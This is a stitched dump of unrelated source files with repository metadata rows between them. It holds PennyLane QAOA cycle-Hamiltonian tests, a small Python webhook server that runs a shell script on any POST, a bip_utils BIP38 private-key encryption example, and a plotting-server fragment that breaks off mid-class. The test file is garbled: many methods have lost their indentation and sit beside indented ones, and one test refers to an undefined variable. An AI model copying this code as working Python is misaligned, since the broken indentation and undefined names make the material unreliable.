# of all edges. Note that the max out-flow constraint is not imposed, which means we can
# pass through nodes more than once
if sum(np.abs(flows)) == 0 and 0 < len(edges) < n_wires:
valid_bitstrings_indx.append(indx)
else:
invalid_bitstrings_indx.append(indx)
# Check that valid bitstrings map to a subset of the valid bitstrings
for indx in valid_bitstrings_indx:
column = h_matrix[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten())
assert destination_indxs.issubset(valid_bitstrings_indx)
# Check that invalid bitstrings map to a subset of the invalid bitstrings
for indx in invalid_bitstrings_indx:
column = h_matrix[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten())
assert destination_indxs.issubset(invalid_bitstrings_indx)
# Now consider a unitary generated by the Hamiltonian
h_matrix_e = expm(1j * h_matrix)
# We expect non-zero transitions among the set of valid bitstrings, and no transitions
# outside
for indx in valid_bitstrings_indx:
column = h_matrix_e[:, indx]
destination_indxs = np.argwhere(column != 0).flatten().tolist()
assert destination_indxs == valid_bitstrings_indx
# Check that invalid bitstrings transition within the set of invalid bitstrings
for indx in invalid_bitstrings_indx:
column = h_matrix_e[:, indx]
destination_indxs = set(np.argwhere(column != 0).flatten().tolist())
assert destination_indxs.issubset(invalid_bitstrings_indx)
@pytest.mark.parametrize(
"g",
[nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])],
)
def test_cycle_mixer_error(self, g):
"""Test if the cycle_mixer raises ValueError"""
# Find Hamiltonian and its matrix representation
with pytest.raises(ValueError, match="Input graph must be a nx.DiGraph or rx.PyDiGraph"):
cycle_mixer(g)
    @pytest.mark.parametrize("g", [nx.lollipop_graph(3, 1), lollipop_graph_rx(3, 1)])
    def test_matrix(self, g):
        """Test that the matrix function works as expected on a fixed example"""
        h = qml.qaoa.bit_flip_mixer(g, 0)
        # 4 wires -> 16x16 dense matrix; expected values computed by hand.
        mat = matrix(h, 4)
        mat_expected = np.array(
            [
                [0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
                [0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            ]
        )
        # ``matrix`` returns a sparse matrix; densify before comparing.
        assert np.allclose(mat.toarray(), mat_expected)
    def test_matrix_rx(self):
        """Test that the matrix function works as expected on a fixed example
        built from a rustworkx star graph."""
        g = rx.generators.star_graph(4, [0, 1, 2, 3])
        h = qml.qaoa.bit_flip_mixer(g, 0)
        # 4 wires -> 16x16 dense matrix; expected values computed by hand.
        mat = matrix(h, 4)
        mat_expected = np.array(
            [
                [0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            ]
        )
        # ``matrix`` returns a sparse matrix; densify before comparing.
        assert np.allclose(mat.toarray(), mat_expected)
    @pytest.mark.parametrize(
        "g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
    )
    def test_edges_to_wires_directed(self, g):
        """Test that edges_to_wires returns the correct mapping on a directed graph"""
        r = edges_to_wires(g)
        # Directed lollipop(4, 1): every edge appears in both orientations.
        assert r == {
            (0, 1): 0,
            (0, 2): 1,
            (0, 3): 2,
            (1, 0): 3,
            (1, 2): 4,
            (1, 3): 5,
            (2, 0): 6,
            (2, 1): 7,
            (2, 3): 8,
            (3, 0): 9,
            (3, 1): 10,
            (3, 2): 11,
            (3, 4): 12,
            (4, 3): 13,
        }
    @pytest.mark.parametrize(
        "g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
    )
    def test_wires_to_edges_directed(self, g):
        """Test that wires_to_edges returns the correct mapping on a directed graph"""
        r = wires_to_edges(g)
        # Inverse of the edges_to_wires mapping for the same directed lollipop graph.
        assert r == {
            0: (0, 1),
            1: (0, 2),
            2: (0, 3),
            3: (1, 0),
            4: (1, 2),
            5: (1, 3),
            6: (2, 0),
            7: (2, 1),
            8: (2, 3),
            9: (3, 0),
            10: (3, 1),
            11: (3, 2),
            12: (3, 4),
            13: (4, 3),
        }
    @pytest.mark.parametrize(
        "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
    )
    def test_loss_hamiltonian_complete(self, g):
        """Test if the loss_hamiltonian function returns the expected result on a
        manually-calculated example of a 3-node complete digraph"""
        # Attach weights 0.5, 1.0, 1.5, ... to the edges in a deterministic order.
        if isinstance(g, rx.PyDiGraph):
            edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(g.edge_list()))}
            for k, v in edge_weight_data.items():
                g.update_edge(k[0], k[1], {"weight": v})
        else:
            edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
            for k, v in edge_weight_data.items():
                g[k[0]][k[1]]["weight"] = v
        h = loss_hamiltonian(g)
        # One PauliZ per edge wire, with coefficient log(weight).
        expected_ops = [
            qml.PauliZ(0),
            qml.PauliZ(1),
            qml.PauliZ(2),
            qml.PauliZ(3),
            qml.PauliZ(4),
            qml.PauliZ(5),
        ]
        expected_coeffs = [np.log(0.5), np.log(1), np.log(1.5), np.log(2), np.log(2.5), np.log(3)]
        assert np.allclose(expected_coeffs, h.coeffs)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
        assert all([type(op) is type(exp) for op, exp in zip(h.ops, expected_ops)])
def test_loss_hamiltonian_error(self):
"""Test if the loss_hamiltonian function raises ValueError"""
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
loss_hamiltonian([(0, 1), (1, 2), (0, 2)])
    @pytest.mark.parametrize(
        "g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
    )
    def test_loss_hamiltonian_incomplete(self, g):
        """Test if the loss_hamiltonian function returns the expected result on a
        manually-calculated example of a 4-node incomplete digraph"""
        # Attach weights 0.5, 1.0, 1.5, ... to the edges in a deterministic order.
        if isinstance(g, rx.PyDiGraph):
            edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(g.edge_list()))}
            for k, v in edge_weight_data.items():
                g.update_edge(k[0], k[1], {"weight": v})
        else:
            edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
            for k, v in edge_weight_data.items():
                g[k[0]][k[1]]["weight"] = v
        h = loss_hamiltonian(g)
        # One PauliZ per edge wire, with coefficient log(weight).
        expected_ops = [
            qml.PauliZ(0),
            qml.PauliZ(1),
            qml.PauliZ(2),
            qml.PauliZ(3),
            qml.PauliZ(4),
            qml.PauliZ(5),
            qml.PauliZ(6),
            qml.PauliZ(7),
            qml.PauliZ(8),
            qml.PauliZ(9),
            qml.PauliZ(10),
            qml.PauliZ(11),
            qml.PauliZ(12),
            qml.PauliZ(13),
        ]
        expected_coeffs = [
            np.log(0.5),
            np.log(1),
            np.log(1.5),
            np.log(2),
            np.log(2.5),
            np.log(3),
            np.log(3.5),
            np.log(4),
            np.log(4.5),
            np.log(5),
            np.log(5.5),
            np.log(6),
            np.log(6.5),
            np.log(7),
        ]
        assert np.allclose(expected_coeffs, h.coeffs)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
        assert all([type(op) is type(exp) for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_self_loop_raises_error(self, g):
"""Test graphs with self loop raises ValueError"""
if isinstance(g, rx.PyDiGraph):
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges())}
for k, v in complete_edge_weight_data.items():
g.update_edge(k[0], k[1], {"weight": v})
g.add_edge(1, 1, "") # add self loop
else:
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
for k, v in edge_weight_data.items():
g[k[0]][k[1]]["weight"] = v
g.add_edge(1, 1) # add self loop
with pytest.raises(ValueError, match="Graph contains self-loops"):
loss_hamiltonian(g)
def test_missing_edge_weight_data_raises_error(self):
"""Test graphs with no edge weight data raises `KeyError`"""
g = nx.complete_graph(3).to_directed()
with pytest.raises(KeyError, match="does not contain weight data"):
loss_hamiltonian(g)
def test_missing_edge_weight_data_without_weights(self):
"""Test graphs with no edge weight data raises `KeyError`"""
g = rx.generators.mesh_graph(3, [0, 1, 2])
with pytest.raises(TypeError, match="does not contain weight data"):
loss_hamiltonian(g)
    def test_square_hamiltonian_terms(self):
        """Test if the _square_hamiltonian_terms function returns the expected result on a fixed
        example"""
        coeffs = [1, -1, -1, 1]
        ops = [qml.Identity(0), qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(3)]
        # Squaring a 4-term sum yields the 16 pairwise products, in row-major order.
        expected_coeffs = [
            1,
            -1,
            -1,
            1,
            -1,
            1,
            1,
            -1,
            -1,
            1,
            1,
            -1,
            1,
            -1,
            -1,
            1,
        ]
        expected_ops = [
            qml.Identity(0),
            qml.PauliZ(0),
            qml.PauliZ(1),
            qml.PauliZ(3),
            qml.PauliZ(0),
            qml.Identity(0),
            qml.PauliZ(0) @ qml.PauliZ(1),
            qml.PauliZ(0) @ qml.PauliZ(3),
            qml.PauliZ(1),
            qml.PauliZ(0) @ qml.PauliZ(1),
            qml.Identity(0),
            qml.PauliZ(1) @ qml.PauliZ(3),
            qml.PauliZ(3),
            qml.PauliZ(0) @ qml.PauliZ(3),
            qml.PauliZ(1) @ qml.PauliZ(3),
            qml.Identity(0),
        ]
        squared_coeffs, squared_ops = _square_hamiltonian_terms(coeffs, ops)
        assert squared_coeffs == expected_coeffs
        assert all(
            [
                op1.name == op2.name and op1.wires == op2.wires
                for op1, op2 in zip(expected_ops, squared_ops)
            ]
        )
    @pytest.mark.parametrize(
        "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
    )
    def test_inner_out_flow_constraint_hamiltonian(self, g):
        """Test if the _inner_out_flow_constraint_hamiltonian function returns the expected result
        on a manually-calculated example of a 3-node complete digraph relative to the 0 node"""
        h = _inner_out_flow_constraint_hamiltonian(g, 0)
        expected_ops = [
            qml.Identity(0),
            qml.PauliZ(0) @ qml.PauliZ(1),
            qml.PauliZ(0),
            qml.PauliZ(1),
        ]
        expected_coeffs = [2, 2, -2, -2]
        assert np.allclose(expected_coeffs, h.coeffs)
        # Operators are compared via their string representation and wires.
        for i, expected_op in enumerate(expected_ops):
            assert str(h.ops[i]) == str(expected_op)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_inner_out_flow_constraint_hamiltonian_error(self, g):
"""Test if the _inner_out_flow_constraint_hamiltonian function raises ValueError"""
with pytest.raises(ValueError, match=r"Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_inner_out_flow_constraint_hamiltonian(g, 0)
    @pytest.mark.parametrize(
        "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
    )
    def test_inner_net_flow_constraint_hamiltonian(self, g):
        """Test if the _inner_net_flow_constraint_hamiltonian function returns the expected result on a manually-calculated
        example of a 3-node complete digraph relative to the 0 node"""
        h = _inner_net_flow_constraint_hamiltonian(g, 0)
        expected_ops = [
            qml.Identity(0),
            qml.PauliZ(0) @ qml.PauliZ(1),
            qml.PauliZ(0) @ qml.PauliZ(2),
            qml.PauliZ(0) @ qml.PauliZ(4),
            qml.PauliZ(1) @ qml.PauliZ(2),
            qml.PauliZ(1) @ qml.PauliZ(4),
            qml.PauliZ(2) @ qml.PauliZ(4),
        ]
        expected_coeffs = [4, 2, -2, -2, -2, -2, 2]
        assert np.allclose(expected_coeffs, h.coeffs)
        # Operators are compared via their string representation and wires.
        for i, expected_op in enumerate(expected_ops):
            assert str(h.ops[i]) == str(expected_op)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_inner_net_flow_constraint_hamiltonian_error(self, g):
"""Test if the _inner_net_flow_constraint_hamiltonian function returns raises ValueError"""
with pytest.raises(ValueError, match=r"Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_inner_net_flow_constraint_hamiltonian(g, 0)
    @pytest.mark.parametrize(
        "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
    )
    def test_inner_out_flow_constraint_hamiltonian_non_complete(self, g):
        """Test if the _inner_out_flow_constraint_hamiltonian function returns the expected result
        on a manually-calculated example of a 3-node complete digraph relative to the 0 node, with
        the (0, 1) edge removed"""
        g.remove_edge(0, 1)
        h = _inner_out_flow_constraint_hamiltonian(g, 0)
        # With only one remaining outgoing edge, the constraint term collapses to zero.
        expected_ops = [qml.PauliZ(wires=[0])]
        expected_coeffs = [0]
        assert np.allclose(expected_coeffs, h.coeffs)
        for i, expected_op in enumerate(expected_ops):
            assert str(h.ops[i]) == str(expected_op)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
    @pytest.mark.parametrize(
        "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
    )
    def test_inner_net_flow_constraint_hamiltonian_non_complete(self, g):
        """Test if the _inner_net_flow_constraint_hamiltonian function returns the expected result on a manually-calculated
        example of a 3-node complete digraph relative to the 0 node, with the (1, 0) edge removed"""
        g.remove_edge(1, 0)
        h = _inner_net_flow_constraint_hamiltonian(g, 0)
        expected_ops = [
            qml.Identity(0),
            qml.PauliZ(0),
            qml.PauliZ(1),
            qml.PauliZ(3),
            qml.PauliZ(0) @ qml.PauliZ(1),
            qml.PauliZ(0) @ qml.PauliZ(3),
            qml.PauliZ(1) @ qml.PauliZ(3),
        ]
        expected_coeffs = [4, -2, -2, 2, 2, -2, -2]
        assert np.allclose(expected_coeffs, h.coeffs)
        # Operators are compared via their string representation and wires.
        for i, expected_op in enumerate(expected_ops):
            assert str(h.ops[i]) == str(expected_op)
        assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_out_flow_constraint(self, g):
"""Test the out-flow constraint Hamiltonian is minimised by states that correspond to
subgraphs that only ever have 0 or 1 edge leaving each node
"""
h = out_flow_constraint(g)
m = wires_to_edges(g)
wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)
# We use PL to find the energies corresponding to each possible bitstring
dev = qml.device("default.qubit", wires=wires)
def states(basis_state, **kwargs):
qml.BasisState(basis_state, wires=range(wires))
cost = catch_warn_ExpvalCost(states, h, dev, optimize=True)
# Calculate the set of all bitstrings
bitstrings = itertools.product([0, 1], repeat=wires)
# Calculate the corresponding energies
energies_bitstrings = (
(cost(np.array(bitstring)).numpy(), bitstring) for bitstring in bitstrings
)
for energy, bs in energies_bitstrings:
# convert binary string to wires then wires to edges
wires_ = tuple(i for i, s in enumerate(bs) if s != 0)
edges = tuple(m[w] for w in wires_)
# find the number of edges leaving each node
if isinstance(g, rx.PyDiGraph):
num_edges_leaving_node = {node: 0 for node in g.nodes()}
else:
num_edges_leaving_node = {node: 0 for node in g.nodes}
for e in edges:
num_edges_leaving_node[e[0]] += 1
# check that if the max number of edges is <=1 it corresponds to a state that minimizes
# the out_flow_constraint Hamiltonian
if max(num_edges_leaving_node.values()) > 1:
assert energy > min(energies_bitstrings)[0]
elif max(num_edges_leaving_node.values()) <= 1:
assert energy == min(energies_bitstrings)[0]
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_out_flow_constraint_undirected_raises_error(self, g):
"""Test `out_flow_constraint` raises ValueError if input graph is not directed"""
with pytest.raises(ValueError):
out_flow_constraint(g)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_net_flow_constraint(self, g):
"""Test if the net_flow_constraint Hamiltonian is minimized by states that correspond to a
collection of edges with zero flow"""
h = net_flow_constraint(g)
m = wires_to_edges(g)
wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)
# We use PL to find the energies corresponding to each possible bitstring
dev = qml.device("default.qubit", wires=wires)
def energy(basis_state, **kwargs):
qml.BasisState(basis_state, wires=range(wires))
cost = catch_warn_ExpvalCost(energy, h, dev, optimize=True)
# Calculate the set of all bitstrings
states = itertools.product([0, 1], repeat=wires)
# Calculate the corresponding energies
energies_states = ((cost(np.array(state)).numpy(), state) for state in states)
# We now have the energies of each bitstring/state. We also want to calculate the net flow of
# the corresponding edges
for energy, state in energies_states:
# This part converts from a binary string of wires selected to graph edges
wires_ = tuple(i for i, s in enumerate(state) if s != 0)
edges = tuple(m[w] for w in wires_)
# Calculates the number of edges entering and leaving a given node
if isinstance(g, rx.PyDiGraph):
in_flows = np.zeros(len(g.nodes()))
out_flows = np.zeros(len(g.nodes()))
else:
in_flows = np.zeros(len(g.nodes))
out_flows = np.zeros(len(g.nodes))
for e in edges:
in_flows[e[0]] += 1
out_flows[e[1]] += 1
net_flow = np.sum(np.abs(in_flows - out_flows))
# The test requires that a set of edges with zero net flow must have a corresponding
# bitstring that minimized the energy of the Hamiltonian
if net_flow == 0:
assert energy == min(energies_states)[0]
else:
assert energy > min(energies_states)[0]
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_net_flow_constraint_undirected_raises_error(self, g):
    """Test `net_flow_constraint` raises ValueError if input graph is not directed"""
    with pytest.raises(ValueError):
        # Return value is irrelevant; only the raise is asserted.
        h = net_flow_constraint(g)
@pytest.mark.parametrize(
    "g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_net_flow_and_out_flow_constraint(self, g):
    """Test the combined net-flow and out-flow constraint Hamiltonian is minimised by states that correspond to subgraphs
    that qualify as simple_cycles
    """
    # NOTE(review): this reassignment discards the parametrized `g`, so the
    # retworkx case never actually runs through this test. Left as-is because
    # removing it changes which backends get exercised — confirm intent.
    g = nx.complete_graph(3).to_directed()
    h = net_flow_constraint(g) + out_flow_constraint(g)
    m = wires_to_edges(g)
    wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)

    # Find the energies corresponding to each possible bitstring
    dev = qml.device("default.qubit", wires=wires)

    def states(basis_state, **kwargs):
        qml.BasisState(basis_state, wires=range(wires))

    cost = catch_warn_ExpvalCost(states, h, dev, optimize=True)

    # Calculate the set of all bitstrings
    bitstrings = itertools.product([0, 1], repeat=wires)

    # Calculate the corresponding energies.
    # BUGFIX: this used to be a generator; the first `min(...)` call inside the
    # loop below exhausted it, so only one bitstring was ever checked.
    # Materialize the list and compute the minimum once.
    energies_bitstrings = [
        (cost(np.array(bitstring)).numpy(), bitstring) for bitstring in bitstrings
    ]
    min_energy = min(energies_bitstrings)[0]

    def find_simple_cycle(list_of_edges):
        """Returns True if list_of_edges contains a permutation corresponding to a simple cycle"""
        permutations = list(itertools.permutations(list_of_edges))

        for edges in permutations:
            if edges[0][0] != edges[-1][-1]:  # check first node is equal to last node
                continue
            all_nodes = []
            for edge in edges:
                for n in edge:
                    all_nodes.append(n)
            inner_nodes = all_nodes[
                1:-1
            ]  # find all nodes in all edges excluding the first and last nodes
            nodes_out = [
                inner_nodes[i] for i in range(len(inner_nodes)) if i % 2 == 0
            ]  # find the nodes each edge is leaving
            node_in = [
                inner_nodes[i] for i in range(len(inner_nodes)) if i % 2 != 0
            ]  # find the nodes each edge is entering
            if nodes_out == node_in and (
                len([all_nodes[0]] + nodes_out) == len(set([all_nodes[0]] + nodes_out))
            ):  # check that each edge connect to the next via a common node and that no node is crossed more than once
                return True

    for energy, bs in energies_bitstrings:
        # convert binary string to wires then wires to edges
        wires_ = tuple(i for i, s in enumerate(bs) if s != 0)
        edges = tuple(m[w] for w in wires_)

        if len(edges) and find_simple_cycle(edges):
            assert energy == min_energy
        elif len(edges) and not find_simple_cycle(edges):
            assert energy > min_energy
| [
"[email protected]"
]
| |
78bb32bf7c2e23216cb019c336e44b0b0ba11969 | 97c37b210fad85895f35b7db183a52cf6c37504f | /webhook.py | 1f1c1aaeea9975e4e4de3c8e1b1c17e5a5454547 | []
| no_license | polakowo/py-webhook | 9762b4c810f6cc81d73e0451f298070354102f5a | ee1c38b0ceccdc056fcf121ca45d5c7949ac7075 | refs/heads/master | 2021-01-23T23:53:11.194683 | 2018-02-24T14:10:20 | 2018-02-24T14:10:20 | 122,743,148 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | #!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
# Bind address ("" = all interfaces) and TCP port for the webhook listener.
hostName = ""
hostPort = 8555
def execute():
    """Run the deploy script synchronously; called once per incoming POST."""
    print("Script is being executed")
    import subprocess
    subprocess.call(['sh', './script.sh'])
class MyServer(BaseHTTPRequestHandler):
    """Minimal webhook handler: acknowledge every POST, then run the hook script."""

    def do_POST(self):
        """Acknowledge the request, parse its JSON body, and trigger the script."""
        print("Request received")
        # Reply immediately with an empty 200 response.
        self.send_response(200)
        self.end_headers()
        # Redeploy
        import json
        body_size = int(self.headers['Content-Length'])
        raw_body = self.rfile.read(body_size).decode("utf-8")
        payload = json.loads(raw_body)
        # Add logic here
        execute()
def run():
    """Serve the webhook until interrupted, then close the listening socket."""
    address = (hostName, hostPort)
    server = HTTPServer(address, MyServer)
    print("Webhook listening - %s:%s" % address)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C is the normal shutdown path; swallow it and fall through to cleanup.
        pass
    finally:
        server.server_close()
        print("Webhook stopped - %s:%s" % address)
# Entry point: start the blocking HTTP server.
if __name__ == "__main__":
    run()
| [
"[email protected]"
]
| |
2993e71ab0448d4ec4870ceb291435ef26e334d5 | 63ace5832d453e325681d02f6496a0999b72edcb | /examples/bip38_ec.py | c454a9f615016da836de3cf8a3ab9a067af476d8 | [
"MIT"
]
| permissive | ebellocchia/bip_utils | c9ec04c687f4247e57434319e36b2abab78f0b32 | d15c75ddd74e4838c396a0d036ef6faf11b06a4b | refs/heads/master | 2023-09-01T13:38:55.567370 | 2023-08-16T17:04:14 | 2023-08-16T17:04:14 | 251,130,186 | 244 | 88 | MIT | 2023-08-23T13:46:19 | 2020-03-29T20:42:48 | Python | UTF-8 | Python | false | false | 2,472 | py | """Example of private key encryption/decryption with EC multiplication using BIP38."""
import binascii

from bip_utils import Bip38Decrypter, Bip38EcKeysGenerator, Bip38Encrypter, Bip38PubKeyModes, WifEncoder

# Demonstrates the three BIP38 EC-multiplication flows: intermediate passphrase
# without lot/sequence, with lot/sequence, and the one-shot Bip38Encrypter helper.

# BIP38 passphrase
passphrase = "DummyPassphrase"

# Generate an intermediate passphrase without lot and sequence numbers
int_pass = Bip38EcKeysGenerator.GenerateIntermediatePassphrase(passphrase)
print(f"Intermediate passphrase: {int_pass}")
# Generate an encrypted private key from the intermediate passphrase
priv_key_enc = Bip38EcKeysGenerator.GeneratePrivateKey(int_pass, Bip38PubKeyModes.COMPRESSED)
print(f"Encrypted private key (no lot/sequence): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")

# Generate an intermediate passphrase with lot and sequence numbers
int_pass = Bip38EcKeysGenerator.GenerateIntermediatePassphrase(passphrase,
                                                               lot_num=100000,
                                                               sequence_num=1)
print(f"Intermediate passphrase: {int_pass}")
# Generate an encrypted private key from the intermediate passphrase
priv_key_enc = Bip38EcKeysGenerator.GeneratePrivateKey(int_pass, Bip38PubKeyModes.UNCOMPRESSED)
print(f"Encrypted private key (with lot/sequence): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")

# Or, you can use Bip38Encrypter for generating keys in one-shot
priv_key_enc = Bip38Encrypter.GeneratePrivateKeyEc(passphrase,
                                                   Bip38PubKeyModes.COMPRESSED,
                                                   lot_num=100000,
                                                   sequence_num=1)
print(f"Encrypted private key (with Bip38Encrypter): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")
"[email protected]"
]
| |
bd9959ca27e75ccb48e9805f865384b753390f96 | d35a60fd5242080d87c6408f8f9c2f087c754883 | /server/serverWithDraw.py | 57c22bdc885c0a16c0880c4ae4dfa2911fc17245 | []
| no_license | zhengchengyy/BBDetection | 765bfab717760f319568b991fb38ede64e626629 | 0aa192437dc5cf7526dcceab993a710b712933f7 | refs/heads/master | 2020-04-01T08:34:45.658324 | 2019-11-14T12:47:17 | 2019-11-14T12:47:17 | 153,037,386 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | import pyformulas as pf
import threading
import socketserver
import os
import matplotlib.pyplot as plt
import numpy as np
# configure the figure
import matplotlib as mpl
# Default line style (thin solid red) and a 10x6-inch default figure size.
mpl.rc('lines', linewidth=1, color='r', linestyle='-')
plt.rcParams['figure.figsize'] = (10.0, 6.0)
class PlotThread(threading.Thread):
    """Background thread that continuously redraws the voltage trace.

    Shares the `xs`/`ys` lists with the UDP handler, which appends samples
    while this thread plots them into a pyformulas screen window.
    """
    def __init__(self, xs, ys):
        super(PlotThread, self).__init__()
        self.xs = xs
        self.ys = ys
        self.xindicator = -1  # NOTE(review): never read anywhere in this file

    def run(self):
        fig = plt.figure()
        canvas = np.zeros((480, 640))
        screen = pf.screen(canvas, 'Examine')
        # Fixed y-range; alternatives kept from earlier experiments:
        # plt.ylim(0.4, 1.6)
        plt.ylim(0.6, 1.0)
        # plt.ylim(-0.5, 2)
        # plt.ylim(0.695, 0.705)
        # plt.ylim(0.76, 0.77)
        # plt.ylim(1730, 1750)
        # plt.ylim(0.81,0.8125)
        while True:
            # threadLock.acquire()
            # NOTE(review): uses the module-level `xs` here rather than
            # self.xs — they are the same list in this script, but the
            # inconsistency is worth confirming.
            plt.xlim(xs[-1] - 20, xs[-1] + 2)
            plt.plot(self.xs, self.ys, c='blue')
            # threadLock.release()
            fig.canvas.draw()
